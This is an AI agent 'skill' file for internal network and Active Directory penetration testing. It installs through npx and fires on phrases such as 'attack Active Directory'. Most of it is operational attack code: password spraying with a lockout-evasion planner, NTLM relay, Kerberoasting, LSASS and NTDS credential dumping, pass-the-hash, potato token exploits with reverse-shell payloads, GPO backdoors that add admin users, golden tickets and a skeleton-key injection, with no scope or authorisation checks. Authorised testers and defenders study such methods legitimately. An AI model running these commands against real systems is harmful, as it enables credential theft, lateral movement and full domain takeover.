# network-pentest

Author: hardw00t
# Install this skill:

```bash
# Install this specific skill from the multi-skill repository
npx skills add hardw00t/ai-security-arsenal --skill "network-pentest"
```

# Description

Internal network and Active Directory penetration testing skill for corporate environments. This skill should be used when performing internal network assessments, testing Active Directory security, exploiting Windows/Linux hosts, lateral movement, privilege escalation, and post-exploitation activities. Triggers on requests to pentest internal networks, attack Active Directory, perform lateral movement, or escalate privileges in Windows/Linux environments.

# SKILL.md

---
name: network-pentest
description: "Internal network and Active Directory penetration testing skill for corporate environments. This skill should be used when performing internal network assessments, testing Active Directory security, exploiting Windows/Linux hosts, lateral movement, privilege escalation, and post-exploitation activities. Triggers on requests to pentest internal networks, attack Active Directory, perform lateral movement, or escalate privileges in Windows/Linux environments."
---

## Network Penetration Testing

This skill enables comprehensive internal network and Active Directory penetration testing using tools like BloodHound, Impacket, Responder, CrackMapExec, Mimikatz, and various exploitation frameworks. It covers the full attack lifecycle from reconnaissance to post-exploitation.

## When to Use This Skill

This skill should be invoked when:
- Performing internal network penetration tests
- Attacking Active Directory environments
- Conducting lateral movement testing
- Escalating privileges on Windows/Linux
- Testing network segmentation
- Extracting credentials and hashes
- Performing post-exploitation activities

### Trigger Phrases

- "pentest the internal network"
- "attack Active Directory"
- "perform lateral movement"
- "escalate privileges"
- "extract credentials"
- "test network segmentation"

## Prerequisites

### Required Tools

| Tool | Purpose | Installation |
|------|---------|--------------|
| BloodHound | AD attack path analysis | neo4j + bloodhound binary |
| Impacket | Network protocols toolkit | pip install impacket |
| Responder | LLMNR/NBT-NS poisoner | git clone https://github.com/lgandx/Responder |
| CrackMapExec | Network pentesting | pipx install crackmapexec (archived upstream; NetExec, `nxc`, is the maintained fork with the same syntax) |
| Mimikatz | Credential extraction | Binary from GitHub |
| Evil-WinRM | WinRM shell | gem install evil-winrm |
| Kerbrute | Kerberos bruteforce | Binary from GitHub |
| Rubeus | Kerberos attacks | Binary from GitHub |
| SharpHound | AD data collector | Binary from GitHub |
| Nmap | Network scanning | brew install nmap |
| LinPEAS/WinPEAS | Privilege escalation | Binary from GitHub |

## Attack Methodology

1. **Reconnaissance**
   - Network scanning (Nmap)
   - Service enumeration
   - DNS/LDAP enumeration
   - Share enumeration

2. **Initial Access**
   - LLMNR/NBT-NS poisoning
   - Password spraying
   - Kerberos attacks (AS-REP roasting)
   - Default credentials

3. **Credential Access**
   - Hash extraction (SAM, NTDS)
   - Kerberoasting
   - LSASS dumping
   - Cached credentials

4. **Lateral Movement**
   - Pass-the-hash
   - Pass-the-ticket
   - Over-pass-the-hash
   - WMI/PSExec/WinRM

5. **Privilege Escalation**
   - Local privesc (Windows/Linux)
   - AD privilege escalation
   - Kerberos delegation abuse

6. **Domain Dominance**
   - DCSync attack
   - Golden/Silver tickets
   - Domain persistence

## Network Reconnaissance

### Nmap Scanning

```bash
# Host discovery
nmap -sn 192.168.1.0/24

# Quick port scan (top 100 ports)
nmap -F 192.168.1.0/24

# Full port scan
nmap -p- -T4 192.168.1.0/24

# Service version detection on the ports that matter for AD (Kerberos, LDAP/LDAPS, SMB, GC, RDP, WinRM)
nmap -sV -sC -p 21,22,23,25,53,80,88,135,139,389,443,445,464,636,3268,3389,5985 target

# Aggressive scan
nmap -A -T4 target

# Script scanning (quote the globs so the shell does not expand them against local files;
# the Kerberos scripts are named krb5-*, so a kerberos* pattern matches nothing)
nmap --script "smb-vuln*" target
nmap --script "ldap*" target
nmap --script "krb5-*" target

# Output formats (-oA writes .nmap, .gnmap and .xml at once)
nmap -oA scan_results target
nmap -oX scan.xml target
```
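
The XML output is what the rest of the engagement feeds on, so it is worth turning it into target lists programmatically. The following is an added example, not part of the skill or of nmap: it parses `-oX` output, flags hosts that look like domain controllers (88, 389 and 445 all open) and lists SMB hosts as relay candidates. The XML fragment inside it is constructed to match nmap's schema; the port heuristics are this example's own assumption.

```python
"""Added example (not part of the skill): classify hosts from `nmap -oX` output.

Collects open TCP ports per live host from nmap XML, flags likely domain
controllers (Kerberos 88 + LDAP 389 + SMB 445 all open) and lists SMB hosts
as relay candidates. SAMPLE_XML is a constructed fragment in nmap's schema,
not a real scan.
"""
import ipaddress
import xml.etree.ElementTree as ET

DC_REQUIRED = {88, 389, 445}            # all three must be open to call a host a DC
DC_SUPPORTING = {464, 636, 3268, 3269}  # kpasswd, LDAPS, Global Catalog: strengthen the guess

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostnames><hostname name="dc01.domain.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/></port>
      <port protocol="tcp" portid="88"><state state="open"/><service name="kerberos-sec"/></port>
      <port protocol="tcp" portid="389"><state state="open"/><service name="ldap"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="636"><state state="open"/></port>
      <port protocol="tcp" portid="3268"><state state="open"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="10.10.10.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/></port>
      <port protocol="tcp" portid="445"><state state="open"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="10.10.10.30" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {ip: {"hostname": str | None, "ports": set of open TCP ports}} for hosts that are up."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        ip = next((a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"), None)
        if ip is None:
            continue
        name = host.find("hostnames/hostname")
        open_ports = set()
        for port in host.findall("ports/port"):
            state = port.find("state")
            if port.get("protocol") == "tcp" and state is not None and state.get("state") == "open":
                open_ports.add(int(port.get("portid")))
        hosts[ip] = {"hostname": name.get("name") if name is not None else None, "ports": open_ports}
    return hosts


def likely_domain_controllers(hosts):
    """[(ip, supporting_ports_seen)] for hosts with all of DC_REQUIRED open, lowest IP first."""
    dcs = [(ip, h["ports"] & DC_SUPPORTING) for ip, h in hosts.items() if DC_REQUIRED <= h["ports"]]
    return sorted(dcs, key=lambda t: ipaddress.ip_address(t[0]))


def smb_hosts(hosts):
    """Hosts with 445 open: feed to ntlmrelayx -tf after confirming signing is not required."""
    return sorted((ip for ip, h in hosts.items() if 445 in h["ports"]), key=ipaddress.ip_address)


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_XML)
    for ip, extra in likely_domain_controllers(parsed):
        print(f"DC candidate {ip} ({parsed[ip]['hostname']}), supporting ports: {sorted(extra)}")
    print("SMB hosts:", smb_hosts(parsed))
```

Run it against a real `scan.xml` by replacing `SAMPLE_XML` with the file contents; the DC heuristic is a starting point and should be confirmed with the LDAP and Kerberos enumeration below.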

### Service Enumeration

```bash
# SMB enumeration
smbclient -L //target -N
smbmap -H target
enum4linux -a target
crackmapexec smb target --shares

# LDAP enumeration (anonymous bind; the rootDSE query works even when the DC refuses anonymous searches)
ldapsearch -x -H ldap://target -s base namingcontexts
ldapsearch -x -H ldap://target -b "DC=domain,DC=local"

# DNS enumeration (zone transfer)
dig @target domain.local axfr
dnsrecon -d domain.local -t axfr -n target

# RPC enumeration (null session; -N suppresses the password prompt)
rpcclient -U "" -N target
rpcclient -U "" -N target -c "enumdomusers"
rpcclient -U "" -N target -c "enumdomgroups"

# Kerberos user enumeration (the script needs the realm)
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local' target
```

## Active Directory Reconnaissance

### BloodHound Data Collection

```powershell
# SharpHound collection (Windows, run as a domain user)
.\SharpHound.exe -c All -d domain.local
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
```

```bash
# BloodHound.py (Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -dc dc.domain.local -c All

# Import to BloodHound
# Start neo4j: neo4j console
# Start BloodHound: bloodhound
# Upload the generated JSON/ZIP files through the GUI
```

### BloodHound Queries

```cypher
// Find shortest path to Domain Admins
MATCH p=shortestPath((n:User)-[*1..]->(m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}))
RETURN p

// Principals with DCSync rights (both GetChanges and GetChangesAll are required on the domain object)
MATCH (n1)-[:MemberOf|GetChanges*1..]->(u:Domain {name:"DOMAIN.LOCAL"})
WITH n1,u
MATCH (n1)-[:MemberOf|GetChangesAll*1..]->(u)
RETURN n1.name

// Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u.name,u.serviceprincipalnames

// AS-REP roastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u.name

// Computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

// Find all Domain Admins (including nested group membership)
MATCH (u:User)-[:MemberOf*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"})
RETURN u.name

// High value targets
MATCH (n {highvalue:true}) RETURN n.name, labels(n)
```

### LDAP Enumeration

```bash
# Get domain info (the objectSid attribute here is the domain SID needed later for golden/silver tickets)
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=domain)"

# Enumerate users
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

# Find Kerberoastable accounts (users with an SPN; krbtgt and machine accounts will appear too and are not crackable targets)
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName

# Find AS-REP roastable accounts (bitwise-AND matching rule 1.2.840.113556.1.4.803 on userAccountControl,
# 4194304 = 0x400000 = DONT_REQ_PREAUTH)
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName

# Find computers
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=computer)" dNSHostName operatingSystem

# Enumerate groups
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' \
  -b "DC=domain,DC=local" "(objectClass=group)" cn member
```

## Initial Access

### LLMNR/NBT-NS Poisoning

```bash
# Start Responder (-w starts the rogue WPAD proxy, so a separate --wpad flag is redundant;
# -r and -f are legacy flags that Responder 3.x no longer accepts, where -I eth0 -w is the equivalent)
sudo responder -I eth0 -wrf

# Captured NTLMv2 responses are written under Responder/logs/ as user::DOMAIN:challenge:NTProofStr:blob; crack them
hashcat -m 5600 hashes.txt rockyou.txt

# Relay attacks: Responder must not answer SMB/HTTP itself or it captures instead of relaying
# Edit Responder.conf: SMB = Off, HTTP = Off
# Relay only works against hosts that do not require SMB signing; build the target list from that
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
sudo ntlmrelayx.py -tf targets.txt -smb2support

# Relay to LDAP for privilege escalation (--escalate-user grants the named account elevated ACLs such as DCSync).
# SMB-originated authentication cannot be relayed to LDAP because the client's signing flag is protected by the
# NTLM MIC (unless the DC is missing the CVE-2019-1040 fix, see ntlmrelayx --remove-mic); relay HTTP/WebDAV
# authentication instead, and the DC must not enforce LDAP signing/channel binding.
sudo ntlmrelayx.py -t ldap://dc.domain.local --escalate-user attacker
```

### Password Spraying

```bash
# Check the password policy first: lockout threshold and observation window bound how many
# passwords you may try per user inside one window
crackmapexec smb dc.domain.local -u 'user' -p 'password' --pass-pol

# Kerbrute user enumeration (no credentials; does not increment badPwdCount because no password is sent)
kerbrute userenum -d domain.local --dc dc.domain.local users.txt

# Password spray with Kerbrute: one password across all users (failed Kerberos pre-auth does count toward lockout)
kerbrute passwordspray -d domain.local --dc dc.domain.local users.txt 'Password123!'

# CrackMapExec spray
crackmapexec smb dc.domain.local -u users.txt -p 'Password123!' --continue-on-success

# Spray with lockout awareness (bundled scripts/spray.sh)
spray.sh -smb dc.domain.local users.txt 'Password123!' 1 35
```
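
The lockout policy is what decides how many passwords you can try per round and how long to wait between rounds. The following is an added example, not the skill's bundled `spray.sh`: it pulls the lockout threshold and observation window out of `--pass-pol` style output, groups the password list into rounds that stay a safety margin below the threshold, and renders the resulting CrackMapExec commands with the waits in between. The log lines are constructed to mirror CrackMapExec's layout and the field labels may differ slightly between CrackMapExec/NetExec versions, so the regexes are kept loose; the margin of two attempts is this example's own choice.

```python
"""Added example (not the skill's spray.sh): turn the lockout policy into a spray schedule.

Parses lockout fields from `crackmapexec smb <dc> -u user -p pass --pass-pol`
style output and plans one password per round across all users, staying a
safety margin below the lockout threshold inside each observation window.
SAMPLE_PASS_POL is constructed, not real output.
"""
import re

SAMPLE_PASS_POL = """SMB   10.10.10.5   445   DC01   [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:domain.local) (signing:True) (SMBv1:False)
SMB   10.10.10.5   445   DC01   [+] domain.local\\user:password
SMB   10.10.10.5   445   DC01   [+] Dumping password info for domain: DOMAIN
SMB   10.10.10.5   445   DC01   Minimum password length: 8
SMB   10.10.10.5   445   DC01   Password history length: 24
SMB   10.10.10.5   445   DC01   Maximum password age: 41 days 23 hours 53 minutes
SMB   10.10.10.5   445   DC01   Password Complexity Flags: 000001
SMB   10.10.10.5   445   DC01   Minimum password age: 1 day 4 minutes
SMB   10.10.10.5   445   DC01   Reset Account Lockout Counter: 30 minutes
SMB   10.10.10.5   445   DC01   Locked Account Duration: 30 minutes
SMB   10.10.10.5   445   DC01   Account Lockout Threshold: 5
SMB   10.10.10.5   445   DC01   Forced Log off Time: Not Set
"""


def parse_lockout_policy(text):
    """Return (threshold, observation_window_minutes); threshold None means lockout is disabled."""
    threshold, window = None, 0
    m = re.search(r"Lockout Threshold:\s*(\d+|None)", text, re.I)
    if m and m.group(1).lower() != "none" and int(m.group(1)) > 0:
        threshold = int(m.group(1))
    m = re.search(r"Reset Account Lockout Counter:\s*(\d+)\s*minute", text, re.I)
    if m:
        window = int(m.group(1))
    return threshold, window


def plan_spray(passwords, threshold, window_minutes, margin=2):
    """Group passwords into rounds of at most (threshold - margin) attempts per user per window.

    Every password in a round is sprayed against the whole user list, then the
    spray sleeps for the observation window so badPwdCount resets before the
    next round. Returns [(passwords_in_round, wait_minutes_after_round)].
    """
    if threshold is None:
        return [(list(passwords), 0)]  # no lockout policy: one round, no waiting
    per_round = threshold - margin
    if per_round < 1:
        raise ValueError(f"lockout threshold {threshold} too low to spray safely with margin {margin}")
    rounds = []
    for i in range(0, len(passwords), per_round):
        chunk = list(passwords[i:i + per_round])
        is_last = i + per_round >= len(passwords)
        rounds.append((chunk, 0 if is_last else window_minutes))
    return rounds


def total_minutes(rounds):
    """Wall-clock minutes spent waiting over the whole plan."""
    return sum(wait for _, wait in rounds)


def render_plan(rounds, dc, users_file):
    """Emit crackmapexec commands (one password each) with sleeps between rounds.

    Passwords containing a single quote would need extra quoting; the sample list has none.
    """
    lines = []
    for chunk, wait in rounds:
        for pw in chunk:
            lines.append(f"crackmapexec smb {dc} -u {users_file} -p '{pw}' --continue-on-success")
        if wait:
            lines.append(f"sleep {wait * 60}  # wait out the lockout observation window")
    return lines


if __name__ == "__main__":
    threshold, window = parse_lockout_policy(SAMPLE_PASS_POL)
    candidates = ["Winter2024!", "Summer2024!", "Password1", "Welcome1", "Company2024!", "Changeme1", "P@ssw0rd"]
    plan = plan_spray(candidates, threshold, window)
    print("\n".join(render_plan(plan, "dc.domain.local", "users.txt")))
    print(f"# total waiting time: {total_minutes(plan)} minutes")
```

Fine-grained password policies (PSOs) can override the domain policy for specific groups, and `--pass-pol` only shows the domain default, so the plan is a lower bound on caution, not a guarantee.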

### AS-REP Roasting

```bash
# Find AS-REP roastable users from a username list (no credentials needed)
GetNPUsers.py domain.local/ -dc-ip dc.domain.local -usersfile users.txt -format hashcat

# With credentials: query LDAP for DONT_REQ_PREAUTH accounts and request their AS-REPs
GetNPUsers.py domain.local/user:password -dc-ip dc.domain.local -request

# Crack hashes (mode 18200 = etype 23, $krb5asrep$23$)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
```

### Kerberoasting

```bash
# Request service tickets for every user account with an SPN
GetUserSPNs.py domain.local/user:password -dc-ip dc.domain.local -request

# Output to file
GetUserSPNs.py domain.local/user:password -dc-ip dc.domain.local -request -outputfile kerberoast.txt

# Crack hashes: 13100 is for RC4 tickets ($krb5tgs$23$); AES tickets need 19600 ($krb5tgs$17$) or 19700 ($krb5tgs$18$)
hashcat -m 13100 kerberoast.txt rockyou.txt
john --wordlist=rockyou.txt kerberoast.txt
```

## Credential Access

### LSASS Dumping

```powershell
# Mimikatz (privilege::debug needs SeDebugPrivilege, i.e. a local administrator)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Task Manager (manual - GUI)
# Right-click lsass.exe -> Create dump file

# ProcDump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll MiniDump: run from an elevated cmd.exe (PowerShell treats the comma as an array operator);
# the output path must be absolute
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass_pid> C:\temp\lsass.dmp full

# Parse dump offline
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
pypykatz lsa minidump lsass.dmp
```

### SAM/SYSTEM Extraction

```cmd
REM From live system (Windows, elevated prompt)
reg save HKLM\SAM sam.bak
reg save HKLM\SYSTEM system.bak
reg save HKLM\SECURITY security.bak

REM Volume Shadow Copy (copies of the locked hive files)
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
```

```bash
# Extract hashes offline (SECURITY adds LSA secrets and cached domain logons to the local SAM hashes)
impacket-secretsdump -sam sam.bak -system system.bak -security security.bak LOCAL
```

### NTDS.dit Extraction

```bash
# Remote extraction with secretsdump (uses DRSUAPI replication, i.e. DCSync, by default;
# needs Domain Admin or the two "Replicating Directory Changes" rights)
secretsdump.py domain.local/administrator:password@dc.domain.local

# DCSync, NT hashes only
secretsdump.py domain.local/administrator:password@dc.domain.local -just-dc-ntlm

# Specific user DCSync
secretsdump.py domain.local/administrator:password@dc.domain.local -just-dc-user krbtgt
```

```powershell
# Using Mimikatz
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:Administrator" "exit"
mimikatz.exe "lsadump::dcsync /domain:domain.local /all /csv" "exit"
```

### Cached Credentials

```powershell
# Mimikatz - cached domain credentials (DCC2 / mscash2)
mimikatz.exe "privilege::debug" "lsadump::cache" "exit"
```

```bash
# Crack cached credentials (DCC2 is PBKDF2 with 10240 iterations, so it is slow: use targeted wordlists)
hashcat -m 2100 dcc2_hashes.txt rockyou.txt
```

## Lateral Movement

### Pass-the-Hash

```bash
# Impacket tools (the LM half before the colon is left empty)
psexec.py domain.local/administrator@target -hashes :NTHASH
wmiexec.py domain.local/administrator@target -hashes :NTHASH
smbexec.py domain.local/administrator@target -hashes :NTHASH
atexec.py domain.local/administrator@target -hashes :NTHASH "whoami"

# CrackMapExec (--local-auth for a local account; the same local admin hash across hosts is a common finding)
crackmapexec smb targets.txt -u administrator -H NTHASH --local-auth
crackmapexec smb targets.txt -u administrator -H NTHASH -x "whoami"

# Evil-WinRM
evil-winrm -i target -u administrator -H NTHASH
```

### Pass-the-Ticket

```powershell
# Export tickets with Mimikatz (writes .kirbi files to the current directory)
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

# Import ticket
mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"

# Using Rubeus
Rubeus.exe ptt /ticket:ticket.kirbi
```

```bash
# Impacket with ticket: convert .kirbi to .ccache first, then use the hostname (not an IP) so the SPN matches
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=$PWD/ticket.ccache
psexec.py -k -no-pass domain.local/user@target
```

### Over-Pass-the-Hash

```powershell
# Mimikatz - get a TGT using the NTLM hash (needs privilege::debug); the spawned cmd.exe holds the new logon session
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:domain.local /ntlm:HASH /run:cmd.exe" "exit"

# Rubeus (prefer the AES256 key: an RC4-only AS-REQ from an account that normally uses AES stands out in 4768 events)
Rubeus.exe asktgt /user:administrator /rc4:HASH /ptt
Rubeus.exe asktgt /user:administrator /aes256:AESKEY /ptt
```

### WinRM/PSRemoting

```powershell
# PowerShell remoting
Enter-PSSession -ComputerName target -Credential domain\user
Invoke-Command -ComputerName target -ScriptBlock { whoami } -Credential domain\user
```

```bash
# Evil-WinRM
evil-winrm -i target -u user -p 'password'
evil-winrm -i target -u user -H NTHASH
```

## Privilege Escalation - Windows

### Local Privilege Escalation

```powershell
# WinPEAS
.\winPEAS.exe

# PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# SharpUp
.\SharpUp.exe

# Common vectors
# - Unquoted service paths
# - Weak service permissions
# - AlwaysInstallElevated
# - Stored credentials
# - Token impersonation
# - Kernel exploits
```

### Service Exploitation

```powershell
# Check service permissions (services that Authenticated Users can reconfigure)
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

# Unquoted service paths outside C:\Windows that start automatically
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# Modify the service binary (needs SERVICE_CHANGE_CONFIG on the service); use sc.exe explicitly,
# since sc is an alias for Set-Content in PowerShell, and keep the space after binpath=
sc.exe qc VulnService
sc.exe config VulnService binpath= "C:\temp\reverse.exe"
sc.exe stop VulnService
sc.exe start VulnService
```
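
An unquoted ImagePath with spaces is exploitable because CreateProcess tries each space-delimited prefix as the executable before reaching the real one: for `C:\Program Files\My App\svc.exe` it tries `C:\Program.exe`, then `C:\Program Files\My.exe`, and only then the intended binary. The block below is an added example, not the skill's code or any Windows tool's: it reproduces that search order for the paths the `wmic` line above prints and filters the candidates down to those whose parent directory you can write to. The service records and the set of writable directories are constructed stand-ins for what `wmic`/`sc qc` and `accesschk`/`icacls` would give you on a real host.

```python
"""Added example (not the skill's code): where Windows looks when a service path is unquoted.

Reproduces CreateProcess's prefix search for an unquoted ImagePath and
filters the candidates by writable parent directories. SAMPLE_SERVICES and
the writable-directory sets used with it are constructed.
"""
import ntpath
import re

SAMPLE_SERVICES = {
    "VulnSvc": r"C:\Program Files\Vuln App\bin\svc.exe -k netsvcs",
    "SafeSvc": r'"C:\Program Files\Safe App\svc.exe" -k netsvcs',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}


def hijack_candidates(image_path):
    """Executables Windows would try before the intended one, in order; [] if the path is safe.

    A quoted path yields nothing because the quotes delimit the executable.
    The executable is taken to end at the first token ending in .exe; text after
    it is treated as arguments (a directory name containing '.exe ' would defeat
    this heuristic, which is fine for a triage pass).
    """
    path = image_path.strip()
    if path.startswith('"'):
        return []
    m = re.match(r"(?i)(.*?\.exe)(?=\s|$)", path)
    exe = m.group(1) if m else path
    parts = exe.split(" ")
    # For "C:\A B\C D\x.exe" the prefixes are "C:\A" and "C:\A B\C"; Windows appends .exe to each attempt.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def exploitable(image_path, writable_dirs):
    """Candidates whose parent directory is in `writable_dirs` (what accesschk/icacls would report as writable)."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    return [c for c in hijack_candidates(image_path) if ntpath.dirname(c).rstrip("\\").lower() in writable]


def scan(services, writable_dirs):
    """{service: exploitable candidates} for every service whose ImagePath can be hijacked."""
    hits = {name: exploitable(path, writable_dirs) for name, path in services.items()}
    return {name: cands for name, cands in hits.items() if cands}


if __name__ == "__main__":
    for name, path in SAMPLE_SERVICES.items():
        print(f"{name}: {hijack_candidates(path)}")
    print("exploitable with write access to C:\\Program Files:", scan(SAMPLE_SERVICES, {r"C:\Program Files"}))
```

The `C:\Program.exe` candidate is almost never usable because standard users cannot create files in the root of the system drive; the interesting hits are writable application directories under `Program Files`, and the service also has to be restartable by you (or start at boot) for the planted binary to run.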

### Token Manipulation

```powershell
# All of these need SeImpersonatePrivilege (typical for service accounts such as IIS or MSSQL)

# Juicy Potato (Windows Server 2016, Windows 10 before 1809)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\reverse.exe" -t *

# PrintSpoofer (Windows 10, Server 2016/2019)
PrintSpoofer.exe -i -c cmd

# RoguePotato
RoguePotato.exe -r <attacker_ip> -e "C:\temp\reverse.exe" -l 9999

# GodPotato (Universal)
GodPotato.exe -cmd "cmd /c whoami"
```

## Privilege Escalation - Linux

### Local Enumeration

```bash
# LinPEAS
./linpeas.sh

# LinEnum
./LinEnum.sh -t

# linux-exploit-suggester
./linux-exploit-suggester.sh

# Manual checks
id
sudo -l
find / -perm -4000 -type f 2>/dev/null  # SUID
find / -perm -2000 -type f 2>/dev/null  # SGID
getcap -r / 2>/dev/null                 # Capabilities
cat /etc/crontab
ls -la /etc/cron*
```

### Common Privilege Escalation Vectors

```bash
# Sudo misconfiguration
sudo -l
# (ALL) NOPASSWD: /usr/bin/vim
sudo vim -c ':!/bin/bash'

# SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for exploitation

# Capabilities
getcap -r / 2>/dev/null
# cap_setuid+ep on an interpreter (python, perl) = privilege escalation possible

# Writable /etc/passwd: append a UID 0 user. Double quotes are required so the shell expands
# $(openssl ...); with single quotes the literal text would be appended and the login would fail.
echo "hacker:$(openssl passwd -1 password):0:0::/root:/bin/bash" >> /etc/passwd
su hacker

# Cron jobs
cat /etc/crontab
# Check for writable scripts

# Kernel exploits
uname -a
# Search for matching CVEs
```

## Domain Privilege Escalation

### Kerberos Delegation Attacks

```powershell
# Find delegation (PowerView)
Get-DomainComputer -Unconstrained
Get-DomainComputer -TrustedToAuth

# Unconstrained Delegation
# Coerce authentication to the compromised host (e.g. printer bug / PetitPotam), then
# extract the forwarded TGT with Rubeus monitor mode
Rubeus.exe monitor /interval:5 /filteruser:DC01$

# Constrained Delegation (S4U2Self + S4U2Proxy as the service account)
Rubeus.exe s4u /user:svc /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt
```

Resource-Based Constrained Delegation needs write access to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute (GenericWrite/GenericAll on the computer object) and a principal with an SPN to delegate from; by default any domain user may create up to ten computer accounts (ms-DS-MachineAccountQuota).

```bash
# Add a computer to the domain (if ms-DS-MachineAccountQuota > 0)
impacket-addcomputer domain.local/user:password -computer-name 'FAKE01$' -computer-pass Password123
```

```powershell
# Set delegation on the target (RSAT ActiveDirectory module)
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount FAKE01$
# Derive the RC4 key of FAKE01$ from its password, then request the ticket
Rubeus.exe hash /password:Password123 /user:FAKE01$ /domain:domain.local
Rubeus.exe s4u /user:FAKE01$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target /ptt
```

### ACL Abuse

```powershell
# GenericAll on User: reset the password
net user target NewPassword123! /domain

# GenericAll on Group: add yourself (PowerView)
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

# GenericWrite on User: set an SPN, then Kerberoast the account (targeted Kerberoast)
Set-DomainObject -Identity target -Set @{serviceprincipalname='fake/spn'}

# WriteDACL: grant yourself full rights on the object
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights All -PrincipalIdentity attacker
```

### Group Policy Abuse

```powershell
# Check GPO permissions (PowerView)
Get-DomainGPO | Get-DomainObjectAcl | Where-Object {$_.ActiveDirectoryRights -match "CreateChild|WriteProperty"}

# SharpGPOAbuse: add an immediate scheduled task to a GPO you can write
SharpGPOAbuse.exe --AddComputerTask --TaskName "Backdoor" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net user hacker Password123! /add && net localgroup administrators hacker /add" --GPOName "VulnGPO"
```

## Domain Dominance

### DCSync Attack

```bash
# With secretsdump (requires Replicating Directory Changes and Replicating Directory Changes All on the domain)
secretsdump.py domain.local/domainadmin:password@dc.domain.local

# Get krbtgt hash
secretsdump.py domain.local/domainadmin:password@dc.domain.local -just-dc-user krbtgt
```

```powershell
# Mimikatz
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"
```

### Golden Ticket

```powershell
# Create golden ticket (the domain SID is the objectSid of the domain object from LDAP enumeration)
mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt" "exit"
```

```bash
# Impacket; on DCs patched since November 2021 (PAC_REQUESTOR) the user must exist and -user-id must match its RID
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
```

### Silver Ticket

```powershell
# Create silver ticket for a specific service (forged with the service/machine account NT hash; never touches the DC)
mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:target.domain.local /service:cifs /rc4:SERVICE_HASH /ptt" "exit"
```

```bash
# Impacket
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/target.domain.local Administrator
```

### Skeleton Key

```powershell
# Inject skeleton key into LSASS on the domain controller (master password: mimikatz); needs Domain Admin,
# lives in memory only and disappears on reboot
mimikatz.exe "privilege::debug" "misc::skeleton" "exit"

# Now any domain user can also authenticate with the password "mimikatz" (real passwords keep working)
